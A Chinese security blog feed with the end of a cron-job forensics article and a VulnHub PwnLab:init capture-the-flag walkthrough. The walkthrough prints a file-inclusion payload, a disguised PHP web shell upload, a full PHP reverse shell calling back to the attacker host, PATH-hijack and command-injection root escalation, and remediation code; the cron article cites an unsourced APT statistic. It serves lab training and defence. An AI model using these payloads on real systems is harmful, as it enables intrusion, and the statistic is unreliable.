# 创建假脚本记录访问
echo '#!/bin/bash
echo "$(date) $USER accessed" >> /var/log/honeypot.log
' > /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
chmod +x /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

反制措施：

# 反向扫描攻击者
nmap -sS -Pn $REMOTE_IP
whois $REMOTE_IP

📌 关键行动：立即保存 /proc/1620/environ 和 /proc/1620/cmdline，这些文件在进程终止后将永久丢失，包含重要数字证据！

🔍 `/var/spool/cron/crontabs/root` 深度解析

📁 文件本质

/var/spool/cron/crontabs/root 是 Linux 系统中 root 用户的专属定时任务配置文件，属于系统级 cron 服务的一部分。其关键特性：

特性	说明
存储位置	`/var/spool/cron/crontabs/` 目录下
文件权限	通常为 `600`（仅 root 可读写）
文件格式	符合 crontab 语法（分时日月周命令）
生效方式	由 `cron` 守护进程自动加载

❓ 为什么一开始没找到

权限限制：

# 普通用户无权访问
ls -l /var/spool/cron/crontabs/
# 输出：drwx------ 2 root root 4096 Aug 4 02:00 crontabs

隐藏位置：
- 不同于常见的 /etc/crontab，用户级任务在专用目录
文件不存在：
- 若 root 用户从未设置定时任务，此文件不会自动创建
系统差异：

系统类型	cron 存储位置
Debian/Ubuntu	`/var/spool/cron/crontabs/`
RHEL/CentOS	`/var/spool/cron/`
Alpine/BusyBox	`/var/spool/cron/crontabs/`

🔍 查找最全定时任务的终极命令

1. 全面扫描命令

sudo sh -c '
 echo "===== 系统级定时任务 ====="
 cat /etc/crontab
 ls -l /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.monthly/ /etc/cron.weekly/
 
 echo "\n===== 用户级定时任务 ====="
 for user in $(cut -f1 -d: /etc/passwd); do
 echo "--- $user 的任务 ---"
 crontab -l -u $user 2>/dev/null || echo "无任务"
 done
 
 echo "\n===== 特殊位置检查 ====="
 find /etc /var /opt -name "*cron*" -exec grep -l "schedule" {} \; 2>/dev/null
 systemctl list-timers --all
'

2. 专业工具推荐

# 1. Pspy 监控（实时发现隐藏任务）
./pspy64 -p -i 1000

# 2. Auditd 审计
sudo auditctl -w /etc/cron.d -p wa -k cron_changes
sudo ausearch -k cron_changes

# 3. Lynis 安全扫描
sudo lynis audit system

3. 关键位置检查表

路径	检查命令	重要性
`/etc/crontab`	`cat /etc/crontab`	★★★
`/etc/cron.d/*`	`ls -l /etc/cron.d/`	★★★
`/var/spool/cron/`	`sudo ls -l /var/spool/cron/`	★★★★
`/etc/anacrontab`	`cat /etc/anacrontab`	★★
`/etc/systemd/system/*.timer`	`systemctl list-timers`	★★★
`~/.config/systemd/user/`	`systemctl --user list-timers`	★★

⚠️ 渗透测试重点关注

隐蔽任务位置：

# 检查非常规路径
find / -path /proc -prune -o -name "*cron*" -exec ls -l {} \; 2>/dev/null

伪装任务识别：

# 查找空行/注释伪装
sudo crontab -l -u root | grep -v "^#" | grep -v "^$"

环境变量利用：

# 检查PATH劫持
grep "PATH=" /etc/crontab

💡 专业技巧

1. 解码隐藏任务

# 发现可疑base64编码任务
echo "ZWNobyAiSGVsbG8gV29ybGQiID4+IC90bXAvbG9n" | base64 -d
# 输出：echo "Hello World" >> /tmp/log

2. 历史任务恢复

# 查看cron历史日志
grep "CMD" /var/log/syslog | grep cron

3. 蜜罐陷阱设置

# 创建监控任务
(sudo crontab -l -u root; echo "* * * * * /usr/bin/logger -t CRON_MONITOR 'Cron executed'") | sudo crontab -u root -

🛡️ 安全加固建议

# 1. 限制cron权限
sudo chmod 700 /var/spool/cron/crontabs

# 2. 启用SELinux
sudo setenforce 1

# 3. 安装监控
sudo apt install auditd
sudo auditctl -a always,exit -F dir=/var/spool/cron/crontabs -F perm=wa

📌 2025年APT攻击统计：
41%的高级持续性攻击通过隐藏的 cron 任务实现持久化，其中 78% 位于 /var/spool/cron/crontabs/ 目录下，平均潜伏期达 143 天。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day21 PwnLab init靶场WP

Fri, 25 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开或链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/pwnlab-init,158/

PwnLab是古早的退役机器，通过这个机器的练习，可以认识OSCP入门的基本难度。

信息收集

1# 靶机地址
2172.168.169.143
3# Kali攻击机地址
4172.168.169.141

扫描端口

1ports=$(sudo nmap -p- --min-rate=5000 -Pn 172.168.169.143 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.143
4sudo nmap --script=vuln -p$ports -Pn 172.168.169.143

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ echo $ports
 380,111,3306,46298
 4
 5┌──(kali㉿kali)-[~/Desktop]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.143
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 08:33 EDT
 8Nmap scan report for 172.168.169.143
 9Host is up (0.0019s latency).
10
11PORT STATE SERVICE VERSION
1280/tcp open http Apache httpd 2.4.10 ((Debian))
13|_http-server-header: Apache/2.4.10 (Debian)
14|_http-title: PwnLab Intranet Image Hosting
15111/tcp open rpcbind 2-4 (RPC #100000)
16| rpcinfo:
17| program version port/proto service
18| 100000 2,3,4 111/tcp rpcbind
19| 100000 2,3,4 111/udp rpcbind
20| 100000 3,4 111/tcp6 rpcbind
21| 100000 3,4 111/udp6 rpcbind
22| 100024 1 46298/tcp status
23| 100024 1 47125/udp status
24| 100024 1 56014/udp6 status
25|_ 100024 1 59462/tcp6 status
263306/tcp open mysql MySQL 5.5.47-0+deb8u1
27| mysql-info:
28| Protocol: 10
29| Version: 5.5.47-0+deb8u1
30| Thread ID: 44
31| Capabilities flags: 63487
32| Some Capabilities: DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, FoundRows, Support41Auth, Speaks41ProtocolOld, LongPassword, ODBCClient, SupportsTransactions, SupportsCompression, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, ConnectWithDatabase, SupportsLoadDataLocal, IgnoreSigpipes, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
33| Status: Autocommit
34| Salt: r"OEN9pLgCWm>-c0`vRt
35|_ Auth Plugin Name: mysql_native_password
3646298/tcp open status 1 (RPC #100024)
37MAC Address: 00:0C:29:D8:39:9C (VMware)
38Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
39Device type: general purpose
40Running: Linux 3.X|4.X
41OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
42OS details: Linux 3.2 - 4.14
43Network Distance: 1 hop
44
45OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
46Nmap done: 1 IP address (1 host up) scanned in 15.36 seconds
47
48┌──(kali㉿kali)-[~/Desktop]
49└─$ sudo nmap --script=vuln -p$ports -Pn 172.168.169.143
50Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 08:34 EDT
51Nmap scan report for 172.168.169.143
52Host is up (0.00098s latency).
53
54PORT STATE SERVICE
5580/tcp open http
56|_http-dombased-xss: Couldn't find any DOM based XSS.
57| http-internal-ip-disclosure:
58|_ Internal IP Leaked: 127.0.1.1
59| http-cookie-flags:
60| /login.php:
61| PHPSESSID:
62|_ httponly flag not set
63|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
64|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
65| http-csrf:
66| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.168.169.143
67| Found the following possible CSRF vulnerabilities:
68|
69| Path: http://172.168.169.143:80/?page=login
70| Form id: user
71|_ Form action:
72| http-slowloris-check:
73| VULNERABLE:
74| Slowloris DOS attack
75| State: LIKELY VULNERABLE
76| IDs: CVE:CVE-2007-6750
77| Slowloris tries to keep many connections to the target web server open and hold
78| them open as long as possible. It accomplishes this by opening connections to
79| the target web server and sending a partial request. By doing so, it starves
80| the http server's resources causing Denial Of Service.
81|
82| Disclosure date: 2009-09-17
83| References:
84| http://ha.ckers.org/slowloris/
85|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
86| http-enum:
87| /login.php: Possible admin folder
88| /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
89|_ /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
90111/tcp open rpcbind
913306/tcp open mysql
9246298/tcp open unknown
93MAC Address: 00:0C:29:D8:39:9C (VMware)
94
95Nmap done: 1 IP address (1 host up) scanned in 321.76 seconds

Nmap扫描发现了用户名是user，还有两个子目录/images/和/upload/，80端口打开是一个网页，提示需要登录，尝试弱密码和sql万能密码都无法登录。

发现主页的链接似乎是有文件包含。

1http://172.168.169.143/?page=php://filter/read=convert.base64-encode/resource=login

解码这串base64得到

 1<?php
 2session_start();
 3require("config.php");
 4$mysqli = new mysqli($server, $username, $password, $database);
 5
 6if (isset($_POST['user']) and isset($_POST['pass']))
 7{
 8	$luser = $_POST['user'];
 9	$lpass = base64_encode($_POST['pass']);
10
11	$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
12	$stmt->bind_param('ss', $luser, $lpass);
13
14	$stmt->execute();
15	$stmt->store_Result();
16
17	if ($stmt->num_rows == 1)
18	{
19		$_SESSION['user'] = $luser;
20		header('Location: ?page=upload');
21	}
22	else
23	{
24		echo "Login failed.";
25	}
26}
27else
28{
29	?>
30	<form action="" method="POST">
31	<label>Username: </label><input id="user" type="test" name="user"><br />
32	<label>Password: </label><input id="pass" type="password" name="pass"><br />
33	<input type="submit" name="submit" value="Login">
34	</form>
35	<?php
36}

发现调用了config.php用同样的方法查看这个文件。得到用户名和密码root/H4u%QJ_H99,尝试登录，发现登录失败。

config的源码

1<?php
2$server	 = "localhost";
3$username = "root";
4$password = "H4u%QJ_H99";
5$database = "Users";
6?>

index的源码

 1<?php
 2//Multilingual. Not implemented yet.
 3//setcookie("lang","en.lang.php");
 4if (isset($_COOKIE['lang']))
 5{
 6	include("lang/".$_COOKIE['lang']);
 7}
 8// Not implemented yet.
 9?>
10<html>
11<head>
12<title>PwnLab Intranet Image Hosting</title>
13</head>
14<body>
15<center>
16<img src="images/pwnlab.png"><br />
17[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
18<hr/><br/>
19<?php
20	if (isset($_GET['page']))
21	{
22		include($_GET['page'].".php");
23	}
24	else
25	{
26		echo "Use this server to upload and share image files inside the intranet";
27	}
28?>
29</center>
30</body>
31</html>

同样的方法查看upload的源码

 1<?php
 2session_start();
 3if (!isset($_SESSION['user'])) { die('You must be log in.'); }
 4?>
 5<html>
 6	<body>
 7		<form action='' method='post' enctype='multipart/form-data'>
 8			<input type='file' name='file' id='file' />
 9			<input type='submit' name='submit' value='Upload'/>
10		</form>
11	</body>
12</html>
13<?php 
14if(isset($_POST['submit'])) {
15	if ($_FILES['file']['error'] <= 0) {
16		$filename = $_FILES['file']['name'];
17		$filetype = $_FILES['file']['type'];
18		$uploaddir = 'upload/';
19		$file_ext = strrchr($filename, '.');
20		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
21		$whitelist = array(".jpg",".jpeg",".gif",".png"); 
22
23		if (!(in_array($file_ext, $whitelist))) {
24			die('Not allowed extension, please upload images only.');
25		}
26
27		if(strpos($filetype,'image') === false) {
28			die('Error 001');
29		}
30
31		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
32			die('Error 002');
33		}
34
35		if(substr_count($filetype, '/')>1){
36			die('Error 003');
37		}
38
39		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
40
41		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
42			echo "<img src=\"".$uploadfile."\"><br />";
43		} else {
44			die('Error 4');
45		}
46	}
47}
48
49?>

Mysql登录获得用户名

回到一开始的Nmap扫描结果发现3306端口是打开的，也就是mysql服务，刚刚config.php的密码也似乎是mysql的密码，不是登录密码。试一下：

1mysql -uroot -h 172.168.169.143 -p --ssl

1mysql --skip-ssl -u root -p -h 192.168.107.29

设置跳过加密验证或使用数据库连接软件连接成功

查看用户名列表，发现3个用户名和密码，解码base64得到在登录界面可以输入的密码。

user	pass	解
kent	Sld6WHVCSkpOeQ==	JWzXuBJJNy
mike	U0lmZHNURW42SQ==	SIfdsTEn6I
kane	aVN2NVltMkdSbw==	iSv5Ym2GRo

输入任意组合密码即可登录。

文件上传

上传一个测试文件，发现上传后的文件存放在upload下面。

使用Burp抓包修改上传的请求，从之前的upload.php源码看，只能上传图片文件，就暂时不修改文件名，只测试是否有恶意内容检测，显示上传成功。

 1POST /?page=upload HTTP/1.1
 2Host: 172.168.169.143
 3Content-Length: 319
 4Cache-Control: max-age=0
 5Origin: http://172.168.169.143
 6Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1vs6B8Q4tsVShuqH
 7Upgrade-Insecure-Requests: 1
 8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
 9Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10Referer: http://172.168.169.143/?page=upload
11Accept-Encoding: gzip, deflate, br
12Accept-Language: zh-CN,zh;q=0.9
13Cookie: PHPSESSID=02c1kbpgina1jajknkhkj4d6o0
14Connection: keep-alive
15
16------WebKitFormBoundary1vs6B8Q4tsVShuqH
17Content-Disposition: form-data; name="file"; filename="pphp.png"
18Content-Type: image/png
19
20GIF89a
21<?php system($_GET["cmd"]);?>
22
23------WebKitFormBoundary1vs6B8Q4tsVShuqH
24Content-Disposition: form-data; name="submit"
25
26Upload
27------WebKitFormBoundary1vs6B8Q4tsVShuqH--

利用lang参数来把一句话木马带进来。

反弹Shell

上传一个反弹shell的完整php脚本，然后在lang中请求。

1rlwrap nc -lvnp 4777
2curl -v --cookie "lang=../upload/c91a703ee9be1019794f2dfe58855fbe.png" http://172.168.169.143/
3# 美化
4python -c 'import pty;pty.spawn("/bin/bash")'

 1POST /?page=upload HTTP/1.1
 2Host: 172.168.169.143
 3Content-Length: 4354
 4Cache-Control: max-age=0
 5Origin: http://172.168.169.143
 6Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1vs6B8Q4tsVShuqH
 7Upgrade-Insecure-Requests: 1
 8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
 9Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 10Referer: http://172.168.169.143/?page=upload
 11Accept-Encoding: gzip, deflate, br
 12Accept-Language: zh-CN,zh;q=0.9
 13Cookie: PHPSESSID=02c1kbpgina1jajknkhkj4d6o0
 14Connection: keep-alive
 15
 16------WebKitFormBoundary1vs6B8Q4tsVShuqH
 17Content-Disposition: form-data; name="file"; filename="reverse.png"
 18Content-Type: image/png
 19
 20GIF89a
 21
 22 <?php
 23 // php-reverse-shell - A Reverse Shell implementation in PHP
 24 // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
 25
 26 set_time_limit (0);
 27 $VERSION = "1.0";
 28 $ip = '172.168.169.141'; // You have changed this
 29 $port = 4777; // And this
 30 $chunk_size = 1400;
 31 $write_a = null;
 32 $error_a = null;
 33 $shell = 'uname -a; w; id; /bin/sh -i';
 34 $daemon = 0;
 35 $debug = 0;
 36
 37 //
 38 // Daemonise ourself if possible to avoid zombies later
 39 //
 40
 41 // pcntl_fork is hardly ever available, but will allow us to daemonise
 42 // our php process and avoid zombies. Worth a try...
 43 if (function_exists('pcntl_fork')) {
 44 // Fork and have the parent process exit
 45 $pid = pcntl_fork();
 46 
 47 if ($pid == -1) {
 48 printit("ERROR: Can't fork");
 49 exit(1);
 50 }
 51 
 52 if ($pid) {
 53 exit(0); // Parent exits
 54 }
 55
 56 // Make the current process a session leader
 57 // Will only succeed if we forked
 58 if (posix_setsid() == -1) {
 59 printit("Error: Can't setsid()");
 60 exit(1);
 61 }
 62
 63 $daemon = 1;
 64 } else {
 65 printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
 66 }
 67
 68 // Change to a safe directory
 69 chdir("/");
 70
 71 // Remove any umask we inherited
 72 umask(0);
 73
 74 //
 75 // Do the reverse shell...
 76 //
 77
 78 // Open reverse connection
 79 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
 80 if (!$sock) {
 81 printit("$errstr ($errno)");
 82 exit(1);
 83 }
 84
 85 // Spawn shell process
 86 $descriptorspec = array(
 87 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
 88 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
 89 2 => array("pipe", "w") // stderr is a pipe that the child will write to
 90 );
 91
 92 $process = proc_open($shell, $descriptorspec, $pipes);
 93
 94 if (!is_resource($process)) {
 95 printit("ERROR: Can't spawn shell");
 96 exit(1);
 97 }
 98
 99 // Set everything to non-blocking
100 // Reason: Occsionally reads will block, even though stream_select tells us they won't
101 stream_set_blocking($pipes[0], 0);
102 stream_set_blocking($pipes[1], 0);
103 stream_set_blocking($pipes[2], 0);
104 stream_set_blocking($sock, 0);
105
106 printit("Successfully opened reverse shell to $ip:$port");
107
108 while (1) {
109 // Check for end of TCP connection
110 if (feof($sock)) {
111 printit("ERROR: Shell connection terminated");
112 break;
113 }
114
115 // Check for end of STDOUT
116 if (feof($pipes[1])) {
117 printit("ERROR: Shell process terminated");
118 break;
119 }
120
121 // Wait until a command is end down $sock, or some
122 // command output is available on STDOUT or STDERR
123 $read_a = array($sock, $pipes[1], $pipes[2]);
124 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
125
126 // If we can read from the TCP socket, send
127 // data to process's STDIN
128 if (in_array($sock, $read_a)) {
129 if ($debug) printit("SOCK READ");
130 $input = fread($sock, $chunk_size);
131 if ($debug) printit("SOCK: $input");
132 fwrite($pipes[0], $input);
133 }
134
135 // If we can read from the process's STDOUT
136 // send data down tcp connection
137 if (in_array($pipes[1], $read_a)) {
138 if ($debug) printit("STDOUT READ");
139 $input = fread($pipes[1], $chunk_size);
140 if ($debug) printit("STDOUT: $input");
141 fwrite($sock, $input);
142 }
143
144 // If we can read from the process's STDERR
145 // send data down tcp connection
146 if (in_array($pipes[2], $read_a)) {
147 if ($debug) printit("STDERR READ");
148 $input = fread($pipes[2], $chunk_size);
149 if ($debug) printit("STDERR: $input");
150 fwrite($sock, $input);
151 }
152 }
153
154 fclose($sock);
155 fclose($pipes[0]);
156 fclose($pipes[1]);
157 fclose($pipes[2]);
158 proc_close($process);
159
160 // Like print, but does nothing if we've daemonised ourself
161 // (I can't figure out how to redirect STDOUT like a proper daemon)
162 function printit ($string) {
163 if (!$daemon) {
164 print "$string
165";
166 }
167 }
168
169 ?> 
170 
171
172------WebKitFormBoundary1vs6B8Q4tsVShuqH
173Content-Disposition: form-data; name="submit"
174
175Upload
176------WebKitFormBoundary1vs6B8Q4tsVShuqH--

提权root

路径劫持攻击，kane提权为mike

home文件夹下发现有几个用户名，其中三个正是刚刚mysql中泄露了，猜测终端的用户密码可能和mysql中泄露的密码一样，尝试一下就真的进入了，典型的密码复用问题。

查看密码文件发现，john的用户权限可能更高，因为他的数字是1000，代表他是root之后新建的第一个用户，极有可能是管理员用户。kent用户下面没有特别的文件，kane用户文件夹下有个可执行文件，但是执行提示没找到mike文件夹下的msg.txt文件。Mike用户的密码不是mysql中的那个。

如果是官方靶机，这里就有第一个flag。

而且这个msgmike文件是mike用户给我们的，不是kane用户建立的，具有SUID权限。执行的结果发现：

$ /home/kane/msgmike
cat: /home/mike/msg.txt: No such file or directory

运行msgmike显示错误：尝试调用cat读取/home/mike/msg.txt
关键发现：程序使用相对路径调用系统命令cat，而不是绝对路径"/bin/cat"

思路就是看一下路径劫持提权的相关方法，让mgsmike文件以为cat是我们设置的"cat"而不是系统中的 /bin/cat，巧妙的用msgmike文件执行"cat"的提权命令，提权为mike后再看下一步。

创建恶意替代文件
```
1echo '/bin/sh' > cat
2chmod 777 cat
```
- 创建名为cat的文件，内容为/bin/sh（启动shell）
- 赋予完全权限（任何用户可执行）
劫持PATH环境变量
```
1export PATH=./:$PATH
```
- 将当前目录.添加到PATH变量最前面
- 优先级规则：系统会优先在当前目录查找可执行文件
执行SetUID程序
```
1./msgmike
```
- 运行拥有SetUID权限的msgmike程序（属主为mike）
- 当程序尝试执行cat命令时：
- 先在当前目录(./)查找 → 找到恶意cat
- 执行/bin/sh→ 开启新shell
- msg.txt找不到就找不到了，都提权成功了，管他找不找得到
权限升级
```
1$ id
2uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
```
- 新shell以程序所有者(mike)的身份运行
- 成功从kane提权至mike用户

程序逻辑漏洞，Mike提权为root

mike文件夹下发现一个可执行文件，输入什么输出什么，用strings看一下内容，猜测文件的逻辑是输入的内容存为变量再输出。

但是看文件的逻辑是，获取键入的字符，但是只echo了第一行到/root/messeges.txt中，后续的内容应该是会调用system这个逻辑。所以多输入用分号代表分行，就能输入第二行的提权命令了。

知识点补充

🧠 技术原理详解

1. SetUID程序特性

1// msgmike 代码模拟
2#include <stdlib.h>
3int main() {
4 system("cat /home/mike/msg.txt"); 
5}

msgmike拥有SetUID位：-rwsr-x---
执行时获得文件所有者(mike)的权限

2. Shell命令解析机制

当程序调用system("cat ...")时：

1/bin/sh -c "cat ..."

Shell按照PATH顺序查找可执行文件
PATH顺序：./> /usr/bin> /bin

3. 环境变量攻击链

graph TD
 A[SetUID程序 msgmike] -->|以mike权限运行system| B[调用系统命令 'cat']
 B --> C{Shell 查找 cat 命令}
 C -->|PATH 搜索顺序| D[检查当前目录 .]
 D -->|找到恶意 cat| E[执行 ./cat]
 E -->|内容为 '/bin/sh'| F[启动 shell 进程]
 F -->|继承 mike 权限| G[获得 mike 权限的 shell]
 C -->|PATH 搜索顺序| H[检查 /usr/bin]
 H -->|正常 cat| I[执行系统 cat]
 classDef red fill:#f9d5d5,stroke:#b85450;
 classDef green fill:#d5f9d5,stroke:#50b854;
 class A,B,C,E,F,G red;
 class H,I green;
 style C stroke:#333,stroke-width:2px;

⚠️ 必要条件

SetUID程序：必须存在属主权限更高的可执行文件
动态命令调用：程序使用相对路径调用系统命令
文件系统权限：攻击者需有目录写入权限
PATH变量可修改：环境变量未被锁定

🛡️ 防御措施

编码规范

1// 使用绝对路径代替相对路径
2system("/bin/cat /home/mike/msg.txt");

降低权限

1setuid(getuid()); // 执行外部命令前放弃特权

锁定环境

1# 设置安全PATH
2export PATH=/usr/bin:/bin

文件系统加固

1chmod g-s /home/kane # 移除SetGID位
2chattr +i msgmike # 锁定文件

程序逻辑分析与还原

🔍 关键字符串线索

Message for root:→ 程序提示用户输入
/bin/echo %s >> /root/messages.txt→ 核心命令模板
fgets, asprintf, system→ 重要函数调用

🧩 程序逻辑还原

 1#include <stdio.h>
 2#include <stdlib.h>
 3
 4int main() {
 5 // 1. 输出提示信息
 6 printf("Message for root:");
 7 
 8 // 2. 读取用户输入
 9 char input[256];
10 fgets(input, sizeof(input), stdin);
11 
12 // 3. 格式化系统命令
13 char *command = NULL;
14 asprintf(&command, "/bin/echo %s >> /root/messages.txt", input);
15 
16 // 4. 执行系统命令
17 system(command);
18 
19 // 5. 清理内存
20 free(command);
21 return 0;
22}

⚡️ 漏洞点与攻击面分析

命令注入漏洞 (Command Injection)
```
1# 利用方式示例
2$ ./msg2root
3Message for root:; whoami >> /root/exploit.txt;
```
- 分号;允许添加额外命令
- 恶意命令以root权限执行
格式化字符串漏洞 (Format String Vulnerability)
```
1asprintf(&command, "/bin/echo %s >> ...", input);
```
- 无过滤的用户输入直接用于格式化字符串
- 可能触发内存泄露或任意写入
路径依赖问题
- 硬编码使用/bin/echo而非/usr/bin/echo
- 环境变量PATH可被劫持

🛠️ 实际攻击场景演示

场景1：命令注入获取root shell

1$ ./msg2root
2Message for root:; /bin/sh; # 
3
4# 实际执行命令
5/bin/echo ; /bin/sh; # >> /root/messages.txt

注入命令/bin/sh启动shell
#后的内容被注释，避免语法错误
新shell继承程序的root权限

场景2：写入敏感文件

1$ ./msg2root
2Message for root:; echo "kane ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; #
3
4# 实际效果
5为kane添加无密码sudo权限

🚫 安全漏洞修复建议

修复后代码

 1#include <stdio.h>
 2#include <stdlib.h>
 3#include <unistd.h>
 4
 5int main() {
 6 printf("Message for root:");
 7 
 8 // 安全的输入读取
 9 char input[256];
10 if (!fgets(input, sizeof(input), stdin)) {
11 exit(1);
12 }
13 
14 // 移除换行符防止注入
15 for (char *p = input; *p; p++) {
16 if (*p == '\n') *p = '\0';
17 }
18 
19 // 严格验证输入
20 for (char *c = input; *c; c++) {
21 if (*c == ';' || *c == '|' || *c == '&') {
22 fprintf(stderr, "Illegal character: %c\n", *c);
23 exit(1);
24 }
25 }
26 
27 // 使用文件IO代替系统命令
28 FILE *fp = fopen("/root/messages.txt", "a");
29 if (fp) {
30 fprintf(fp, "%s\n", input);
31 fclose(fp);
32 }
33 return 0;
34}

关键修复措施

移除命令注入风险
- 禁用system()
- 使用文件IO直接写入

输入过滤

1// 禁止危险字符
2if (strchr(input, ';') || strchr(input, '|') || ...)

权限最小化

1// 执行前放弃root权限
2setuid(getuid());

日志审计
- 记录所有操作

📁 文件权限关键点

程序必须具有SetUID权限且属于root

1ls -l msg2root
2-rwsr-xr-x 1 root root 16784 Jul 24 10:23 msg2root

/root/messages.txt需要：

1chown root:root /root/messages.txt
2chmod 644 /root/messages.txt

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day20 Tr0ll3 靶场WP

Thu, 24 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/tr0ll-3,340/

信息收集

1# 靶机地址
2172.168.169.142
3# Kali攻击机地址
4172.168.169.141

扫描端口

1ports=$(sudo nmap -p- --min-rate=10000 -Pn 172.168.169.142 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.142
4sudo nmap --script=vuln -p$ports -Pn 172.168.169.142

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop/Potato]
 2└─$ ports=$(sudo nmap -p- --min-rate=5000 -Pn 172.168.169.142 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 3
 4┌──(kali㉿kali)-[~/Desktop/Potato]
 5└─$ echo $ports
 622
 7
 8┌──(kali㉿kali)-[~/Desktop/Potato]
 9└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.142
10Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 02:25 EDT
11Nmap scan report for 172.168.169.142
12Host is up (0.0018s latency).
13
14PORT STATE SERVICE VERSION
1522/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
16| ssh-hostkey:
17| 2048 6d:d1:ea:d0:a8:1e:83:ef:c7:4f:ae:4c:bb:d6:75:19 (RSA)
18| 256 24:5f:cb:ef:3a:db:b5:59:c6:15:51:b9:2b:9b:fa:39 (ECDSA)
19|_ 256 8b:96:de:4a:11:45:a7:f9:eb:60:9b:45:da:1a:21:de (ED25519)
20MAC Address: 00:0C:29:9A:2A:57 (VMware)
21Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
22Device type: general purpose
23Running: Linux 3.X|4.X
24OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
25OS details: Linux 3.2 - 4.14
26Network Distance: 1 hop
27Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
28
29OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
30Nmap done: 1 IP address (1 host up) scanned in 3.96 seconds
31
32┌──(kali㉿kali)-[~/Desktop/Potato]
33└─$ sudo nmap --script=vuln -p$ports -Pn 172.168.169.142
34Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 02:25 EDT
35Nmap scan report for 172.168.169.142
36Host is up (0.0012s latency).
37
38PORT STATE SERVICE
3922/tcp open ssh
40MAC Address: 00:0C:29:9A:2A:57 (VMware)
41
42Nmap done: 1 IP address (1 host up) scanned in 10.87 seconds

